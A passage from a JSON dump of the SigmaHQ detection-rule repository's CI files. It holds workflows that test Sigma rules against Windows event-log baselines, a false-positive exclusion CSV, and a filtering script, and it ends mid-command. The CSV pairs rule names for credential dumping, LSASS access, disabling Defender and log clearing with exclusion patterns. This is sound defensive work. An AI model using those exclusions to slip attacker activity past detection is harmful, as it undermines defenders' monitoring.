    "content": "# This workflow will install Python dependencies, run tests and lint with a single version of Python\n# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions\n\nname: Goodlog Tests\n\non: [push, pull_request, merge_group, workflow_dispatch]\n\nenv:\n  EVTX_BASELINE_VERSION: v0.8.4\n\njobs:\n  check-baseline-win7:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 7 32-bit baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win7-x86.tgz\n        tar xzf win7-x86.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win7_x86/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win10:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 10 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win10-client.tgz\n        tar xzf win10-client.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Client/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win11:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 11 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client.tgz\n        tar xzf win11-client.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win11-2023:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 11 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win11-client-2023.tgz\n        tar xzf win11-client-2023.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Logs_Win11_2023/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win2022:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 2022 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-evtx.tgz\n        tar xzf win2022-evtx.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-evtx/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win2022-domain-controller:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 2022 baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-ad.tgz\n        tar xzf win2022-ad.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n\n  check-baseline-win2022-0-20348-azure:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: Download evtx-sigma-checker\n      run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n    - name: Download and extract Windows 2022.0.20348 Azure baseline\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz\n        tar xzf win2022-0-20348-azure.tgz\n    - name: Check for Sigma matches in baseline\n      run: |\n        chmod +x evtx-sigma-checker\n        ./evtx-sigma-checker --log-source tests/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ --rule-path rules-emerging-threats/ --rule-path rules-threat-hunting/ > findings.json\n    - name: Show findings excluding known FPs\n      run: |\n        chmod +x .github/workflows/matchgrep.sh\n        ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv\n"
  },
  {
    "path": ".github/workflows/greetings.yml",
    "content": "name: Greet First-Time Contributors\n\non:\n  pull_request:\n    types:\n      - opened\n  issues:\n    types:\n      - opened\n\npermissions:\n  issues: write\n  pull-requests: write\n  id-token: write\n  contents: read\n\njobs:\n  greeting:\n    name: Greet First-Time Contributors\n    if: github.event_name == 'issues' || (github.event_name == 'pull_request' && github.event.pull_request.head.repo.full_name != github.repository)\n    runs-on: ubuntu-latest\n\n    steps:\n      - uses: actions/first-interaction@v3\n        with:\n          issue_message: |\n            Welcome :wave:\n\n            It looks like this is your first issue on the Sigma rules repository!\n\n            The following repository accepts issues related to `false positives` or `rule ideas`.\n\n            If you're reporting an issue related to the pySigma library please consider submitting it [here](https://github.com/SigmaHQ/pySigma)\n\n            Thanks for taking the time to open this issue, and welcome to the Sigma community! :smiley:\n\n\n          pr_message: |\n            Welcome :wave:\n            \n            It looks like this is your first pull request on the Sigma rules repository!\n\n            Please make sure to read the [SigmaHQ conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/) to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.\n\n            Thanks again, and welcome to the Sigma community! :smiley:\n"
  },
  {
    "path": ".github/workflows/known-FPs.csv",
    "content": "RuleId;RuleName;MatchString\n8e5e38e4-5350-4c0b-895a-e872ce0dd54f;Msiexec Initiated Connection;.*\nad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94;Suspicious WSMAN Provider Image Loads;.*\ndb809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;python-3\ndb809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\\.exe\n96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;.*\n1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon\ne28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell\n8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;(sysmon-intense\\.xml|sysmonconfig-trace\\.xml)\n8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon)\n4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_\n36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR\n73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote\n6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\\\Integration\\\\Integrator\\.exe\n00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4  Task: 0\n162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\\.exe\ncdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\\.49\\.150\\.241\nbef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\\.101\\.64\\.223\nbef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;146\\.75\\.117\\.55\n9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\\.exe\n9494479d-d994-40bf-a8b1-eea890237021;Scheduled Task Creation From Potential Suspicious Parent Location;.*\n81325ce1-be01-4250-944f-b4789644556f;Suspicius Schtasks From Env Var Folder;TVInstallRestore\n6ea3bf32-9680-422d-9f50-e90716b12a66;UAC Bypass Via Wsreset;EventType: DeleteKey\n43f487f0-755f-4c2a-bce7-d6d2eec2fcf8;Suspicious Add Scheduled Task From User AppData Temp;TVInstallRestore\nc187c075-bb3e-4c62-b4fa-beae0ffc211f;Deteled Rule in Windows Firewall with Advanced Security;Dropbox.*\\\\netsh\\.exe\n69aeb277-f15f-4d2d-b32a-55e883609563;Disabling Windows Event Auditing;Computer: .*\nac175779-025a-4f12-98b0-acdaeb77ea85;PowerShell Script Run in AppData;\\\\Evernote-\n1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC\n734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6\n734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon\na96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\\.exe\n349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\\.exe\na96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\\.exe\n349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;target\\.exe\na96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\\.exe\n349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\\.exe\n7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\\.exe\n949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: Agamemnon\n949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Explorer Process Tree Break;Computer: WinDev2310Eval\nfdbf0b9d-0182-4c43-893b-a1eaab92d085;Newly Registered Protocol Handler;.*\n100ef69e-3327-481c-8e5c-6d80d9507556;System Eventlog Cleared;.*\n52a85084-6989-40c3-8f32-091e12e17692;Suspicious Usage of CVE_2021_34484 or CVE 2022_21919;Computer: Agamemnon\n573df571-a223-43bc-846e-3f98da481eca;Copy a File Downloaded From Internet;7z\\.exe\n37774c23-25a1-4adb-bb6d-8bb9fd59c0f8;Image Load of VSS Dll by Uncommon Executable;SetupFrontEnd\\.exe\n1a31b18a-f00c-4061-9900-f735b96c99fc;Remote Access Tool Services Have Been Installed - System;ServiceName: TeamViewer\nc8b00925-926c-47e3-beea-298fd563728e;Remote Access Tool Services Have Been Installed - Security;ServiceName: TeamViewer\nb69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;msedge\\.exe \nb69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;firefox\\.exe \nb69888d4-380c-45ce-9cf9-d9ce46e67821;Executable in ADS;7z\\.exe\n65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;powershell\\.exe\n65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: WIN-FPV0DSIC9O6.sigma.fr\na62b37e0-45d3-48d9-a517-90c1a1b0186b;Eventlog Cleared;Computer: .*\n4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\\.exe\n4eec988f-7bf0-49f1-8675-1e6a510b3a2a;Potential PendingFileRenameOperations Tamper;target\\.tmp\n48bfd177-7cf2-412b-ad77-baf923489e82;Image Load of VSS Dll by Uncommon Executable;SetupFrontEnd.exe\n87911521-7098-470b-a459-9a57fc80bdfd;Sysmon Configuration Updated;.*\n0eb46774-f1ab-4a74-8238-1155855f2263;Disable Windows Defender Functionalities Via Registry Keys;.*\ne9d4ab66-a532-4ef7-a502-66a9e4a34f5d;NTLMv1 Logon Between Client and Server;.*\nccb5742c-c248-4982-8c5c-5571b9275ad3;Potential Suspicious Findstr.EXE Execution;httpd\\.exe\n9ae01559-cf7e-4f8e-8e14-4c290a1b4784;CredUI.DLL Load By Uncommon Process;Spotify\\.exe\n52182dfb-afb7-41db-b4bc-5336cb29b464;Suspicious File Download From File Sharing Websites;objects\\.githubusercontent\\.com\nce72ef99-22f1-43d4-8695-419dcb5d9330;Suspicious Windows Service Tampering;TeamViewer\ndae8171c-5ec6-4396-b210-8466585b53e9;SCM Database Privileged Operation;0x277c6\n3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781;OpenSSH Server Listening On Socket;.*\nb69888d4-380c-45ce-9cf9-d9ce46e67821;Hidden Executable In NTFS Alternate Data Stream;.*\n4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76;Potentially Suspicious AccessMask Requested From LSASS;\\\\setup\\.exe\nd99b79d2-0a6f-4f46-ad8b-260b6e17f982;Security Eventlog Cleared;Computer: WinDevEval\nb28e58e4-2a72-4fae-bdee-0fbe904db642;Windows Defender Real-time Protection Disabled;Computer: WinDev2310Eval\nef9dcfed-690c-4c5d-a9d1-482cd422225c;Browser Execution In Headless Mode;.*\n65236ec7-ace0-4f0c-82fd-737b04fd4dcb;EVTX Created In Uncommon Location;Computer: (DESKTOP-6D0DBMB|WinDev2310Eval)\nde587dce-915e-4218-aac4-835ca6af6f70;Potential Persistence Attempt Via Run Keys Using Reg.EXE;\\\\Discord\\\\\n24357373-078f-44ed-9ac4-6d334a668a11;Direct Autorun Keys Modification;Discord\\.exe\n8fbf3271-1ef6-4e94-8210-03c2317947f6;Cred Dump Tools Dropped Files;Svchost\\.exe\nc7da8edc-49ae-45a2-9e61-9fd860e4e73d;PUA - Sysinternals Tools Execution - Registry;.*\ndcff7e85-d01f-4eb5-badd-84e2e6be8294;Windows Default Domain GPO Modification via GPME;Computer: WIN-FPV0DSIC9O6.sigma.fr\n416bc4a2-7217-4519-8dc7-c3271817f1d5;Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location;procexp64\\.exe\n5a6b7c8d-9e0f-1a2b-3c4d-5e6f7a8b9c0d;Cmd Launched with Hidden Start Flags to Suspicious Targets;xampp\n558eebe5-f2ba-4104-b339-36f7902bcc1a;File Creation Date Changed to Another Year;(\\\\target\\.exe|thm\\.wxl|\\\\AppData\\\\Local\\\\Temp\\\\)\n5e993621-67d4-488a-b9ae-b420d08b96cb;Service Installation in Suspicious Folder;\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\MBAMInstallerService\\.exe\n"
  },
  {
    "path": ".github/workflows/matchgrep.sh",
    "content": "#!/bin/bash\n\ninfile=$1\nfps=$2\n\nif [[ -z ${infile} || -z ${fps} ]]; then\n    >&2 echo \"usage: $0 [json-file] [FPs.csv]\" \n    exit 1\nfi\n\nif [[ ! -f ${infile}  || ! -r ${infile} ]]; then\n    >&2 echo \"${infile} is not a valid, readable file\"\n    exit 2\nfi\nif [[ ! -f ${fps}  || ! -r ${fps} ]]; then\n    >&2 echo \"${fps} is not a valid, readable file\"\n    exit 2\nfi\n\n# Exclude all rules with level \"low\"\nfindings=$(grep -v '\"RuleLevel\":\"low\"' \"${infile}\")\n\n{\n    read -r # Skip CSV header\n    while IFS=\\; read -r id _name fpstring; do\n        findings=$(echo \"${findings}\" | grep -iEv \"\\\"RuleId\\\":\\\"${id}\\\".*${fpstring}\")\n    done\n} < \"${fps}\"\n\nif [[ -z ${findings} ]]; then\n    echo \"No matches found.\"\nelse\n    >&2 echo \"Found matches:\"\n    echo \"${findings}\"\n    >&2 echo\n    >&2 echo \"Match overview:\"\n    echo \"${findings}\" | jq -c '. | {RuleId, RuleTitle, RuleLevel}' | sort | uniq -c | sort -nr >&2\n    >&2 echo\n    >&2 echo \"You either need to tune your rule(s) for false positives or add a false positive filter to .github/workflows/known-FPs.csv\"\n    exit 3\nfi\n"
  },
  {
    "path": ".github/workflows/pr-labeler.yml",
    "content": "on:\n  pull_request_target:\n    types:\n      - opened\n\nname: PR Labeler Workflow\n\njobs:\n  triage:\n    permissions:\n      contents: read\n      pull-requests: write\n    runs-on: ubuntu-latest\n    steps:\n      - uses: actions/labeler@v6\n"
  },
  {
    "path": ".github/workflows/ref-archiver.yml",
    "content": "name: \"Reference Archiver\"\n\non:\n  #push:\n  #  branches:\n  #      - \"*\"\n  schedule:\n    - cron: \"30 1 1,15 * *\" # At 01:30 on day-of-month 1 and 15.\n  \n  # Allows you to run this workflow manually from the Actions tab\n  workflow_dispatch:\n\njobs:\n  archive:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Execute Reference Archiver\n      run: |\n        pip install PyYAML argparse requests\n        python tests/reference-archiver.py\n    - name: Create Pull Request\n      uses: peter-evans/create-pull-request@v5\n      with:\n        reviewers: nasbench, frack113, phantinuss\n        delete-branch: true\n        branch: 'create-pull-request/reference-archiver'\n        commit-message: 'chore: archive new rule references and update cache file'\n        title: 'Archive New Rule References'\n        body: |\n          ### Summary of the Pull Request\n\n          This PR update the cache file used to save already archived references with newly archived results\n\n          ### Changelog\n\n          chore: archive new rule references and update cache file\n\n          ### Example Log Event\n\n          N/A\n\n          ### Fixed Issues\n\n          N/A\n\n          ### SigmaHQ Rule Creation Conventions\n          \n          - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)\n"
  },
  {
    "path": ".github/workflows/regression-tests.yml",
    "content": "name: Regression Tests\n\non: [push, pull_request, workflow_dispatch]\n\nenv:\n  EVTX_BASELINE_VERSION: v0.8.4\n\njobs:\n  true-positive-tests:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n\n    - name: Set up Python\n      uses: actions/setup-python@v6\n      with:\n        python-version: '3.11'\n\n    - name: Install Python dependencies\n      run: |\n        python -m pip install --upgrade pip\n        pip install pyyaml\n\n    - name: Download evtx-sigma-checker\n      run: |\n        wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker\n        chmod +x evtx-sigma-checker\n\n    - name: Run regression tests\n      run: |\n        python tests/regression_tests_runner.py --rules-paths rules rules-emerging-threats rules-threat-hunting --evtx-checker ./evtx-sigma-checker --thor-config tests/thor.yml --ignore-validation\n"
  },
  {
    "path": ".github/workflows/release.yml",
    "content": "on:\n  push:\n    tags:\n      - 'r*'\n\nname: Create Release\n\njobs:\n  build:\n    name: Create Release\n    runs-on: ubuntu-latest\n    steps:\n      - name: Checkout code\n        uses: actions/checkout@v5\n        with:\n          fetch-depth: 0\n      - name: Generate Changelog\n        run: |\n          prev_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -2 | head -1)\n          curr_tag=$(git for-each-ref --sort=creatordate --format '%(refname:lstrip=2)' refs/tags | grep ^r | tail -1)\n          echo \"Previous tag: ${prev_tag}\"\n          echo \"Current tag: ${curr_tag}\"\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*new: ' -c) -gt 0 ]]; then echo \"### New Rules\" > changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*new: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*update: ' -c) -gt 0 ]]; then echo \"### Updated Rules\" >> changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*update: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*remove: ' -c) -gt 0 ]]; then echo \"### Removed / Deprecated Rules\" >> changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*remove: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          if [[ $(git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*fix: ' -c) -gt 0 ]]; then echo \"### Fixed Rules\" >> changes.txt; fi\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -E '^\\s*fix: ' | sort -u | sed -e 's%^% - %' >> changes.txt\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP 'Merge PR #\\d+ from \\K(@\\S+)' | sort -u > authors_raw.txt\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -oP \"Co-authored-by: \\K.*(?= <)\" | sort -u | sed -e 's%^%@%' >> authors_raw.txt\n          git log --pretty=%B ${prev_tag}..${curr_tag} | grep -ioP \"Thanks: \\K.*?(?=$| for)\" | sort -u >> authors_raw.txt\n          LC_ALL=en_US.UTF-8 sort -u authors_raw.txt | grep -v 'dependabot\\[bot\\]' > authors.txt\n          cat changes.txt >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"### Acknowledgement\" >> changelog.txt\n          echo \"Thanks to $(perl -pe 's%\\n%, %' authors.txt | sed 's%, $%%') for their contribution to this release\" >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"### Which Sigma rule package should I use?\" >> changelog.txt\n          echo \"A detailed explanation can be found in the [Releases.md](Releases.md) file. If you are new to Sigma, we recommend starting with the \\\"Core\\\" ruleset.\" >> changelog.txt\n          echo \"\" >> changelog.txt\n          echo \"The [latest release package on GitHub](https://docs.github.com/en/repositories/releasing-projects-on-github/linking-to-releases#linking-to-the-latest-release) can always be found [here](https://github.com/SigmaHQ/sigma/releases/latest).\" >> changelog.txt\n          cat changelog.txt\n      - name: Build all release packages\n        run: |\n          python3 tests/sigma-package-release.py --min-status test --min-level high --rule-types generic --outfile sigma_core.zip\n          python3 tests/sigma-package-release.py --min-status test --min-level medium --rule-types generic --outfile sigma_core+.zip\n          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic --outfile sigma_core++.zip\n          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types et --outfile sigma_emerging_threats_addon.zip\n          python3 tests/sigma-package-release.py --min-status experimental --min-level medium --rule-types generic et --outfile sigma_all_rules.zip\n      - name: Create Release with Assets\n        id: create_release\n        uses: softprops/action-gh-release@v2\n        with:\n          tag_name: ${{ github.ref }}\n          name: Release ${{ github.ref_name }}\n          body_path: changelog.txt\n          token: ${{ secrets.GITHUB_TOKEN }}\n          draft: true\n          prerelease: false\n          files: |\n            sigma_core.zip\n            sigma_core+.zip\n            sigma_core++.zip\n            sigma_emerging_threats_addon.zip\n            sigma_all_rules.zip\n"
  },
  {
    "path": ".github/workflows/sigma-rule-deprecated.yml",
    "content": "name: \"Create deprecated summary\"\n\non:\n  #push:\n  #  branches:\n  #      - \"*\"\n  schedule:\n    - cron: \"0 0 1 * *\" # At 00:00 on day-of-month 1.\n\n  # Allows you to run this workflow manually from the Actions tab\n  workflow_dispatch:\n\njobs:\n  pull-master:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Execute deprecated rules script\n      run: |\n        pip install pySigma\n        python tests/deprecated_rules.py --format csv\n        python tests/deprecated_rules.py --format json\n    - name: Create Pull Request\n      uses: peter-evans/create-pull-request@v7\n      with:\n        reviewers: nasbench, frack113, phantinuss\n        delete-branch: true\n        commit-message: 'chore: update deprecated csv'\n        branch: 'create-pull-request/rule-deprecated'\n        title: 'Update deprecated.csv'\n        body: |\n          ### Summary of the Pull Request\n\n          This PR updates the deprecated summary file `deprecated.csv` and `deprecated.json`\n\n          ### Changelog\n\n          chore: update deprecated.csv and deprecated.json\n\n          ### Example Log Event\n\n          N/A\n\n          ### Fixed Issues\n\n          N/A\n\n          ### SigmaHQ Rule Creation Conventions\n\n          - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/tree/main/sigmahq)\n"
  },
  {
    "path": ".github/workflows/sigma-rule-promoter.yml",
    "content": "#name: \"Promote Experimental Rules To Test\"\n#\n#on:\n#  #push:\n#  #  branches:\n#  #      - \"*\"\n#  schedule:\n#    - cron: \"0 0 1 * *\" # At 00:00 on day-of-month 1.\n#  \n#  # Allows you to run this workflow manually from the Actions tab\n#  workflow_dispatch:\n#\n#jobs:\n#  pull-master:\n#    runs-on: ubuntu-latest\n#    steps:\n#    - uses: actions/checkout@v5\n#      with:\n#        submodules: true\n#    - name: Set up Python 3.11\n#      uses: actions/setup-python@v6\n#      with:\n#        python-version: 3.11\n#    - name: Execute Rule Promoter Script\n#      run: |\n#        pip install pySigma\n#        python tests/promote_rules_status.py\n#    - name: Create Pull Request\n#      uses: peter-evans/create-pull-request@v7\n#      with:\n#        reviewers: nasbench, frack113, phantinuss\n#        delete-branch: true\n#        commit-message: 'chore: promote older rules status from `experimental` to `test`'\n#        branch: 'create-pull-request/rule-promotion'\n#        title: 'Promote Older Rules From `experimental` to `test`'\n#        body: |\n#          ### Summary of the Pull Request\n#\n#          This PR promotes and upgrade the status of rules that haven't been changed for over 300 days from `experimental` to `test`\n#\n#          ### Changelog\n#\n#          chore: promote older rules status from `experimental` to `test`\n#\n#          ### Example Log Event\n#\n#          N/A\n#\n#          ### Fixed Issues\n#\n#          N/A\n#\n#          ### SigmaHQ Rule Creation Conventions\n#          \n#          - If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/sigmahq_conventions.md)\n#\n"
  },
  {
    "path": ".github/workflows/sigma-test.yml",
    "content": "# This workflow will install Python dependencies, run tests and lint with a single version of Python\n# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions\n\nname: Sigma Rule Tests\n\non: [push, pull_request, merge_group, workflow_dispatch]\n\njobs:\n  yamllint:\n    runs-on: ubuntu-latest\n    steps:\n    - uses: actions/checkout@v5\n    - name: yaml-lint\n      uses: ibiqlik/action-yamllint@v3\n      with:\n        strict: true # fail on warnings as well\n\n  test-sigma-logsource:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Test Sigma logsource\n      run: |\n        pip install PyYAML colorama\n        python tests/test_logsource.py\n\n  test-sigma-legacy:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Test Sigma Rules\n      run: |\n        pip install PyYAML colorama\n        python tests/test_rules.py\n\n  sigma-check:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Set up Python 3.11\n      uses: actions/setup-python@v6\n      with:\n        python-version: 3.11\n    - name: Install dependencies\n      run: |\n        pip install pysigma\n        pip install sigma-cli\n        pip install pySigma-validators-sigmahq==0.20.*\n    - name: Test Sigma Rule Syntax\n      run: |\n        sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules*\n\n  duplicate-id-check:\n    runs-on: ubuntu-latest\n    needs: yamllint\n    steps:\n    - uses: actions/checkout@v5\n      with:\n        submodules: true\n    - name: Check for duplicate IDs\n      shell: /usr/bin/bash {0}  # Use bash without -e to enable exit code manipulation\n      run: |\n        grep -rh 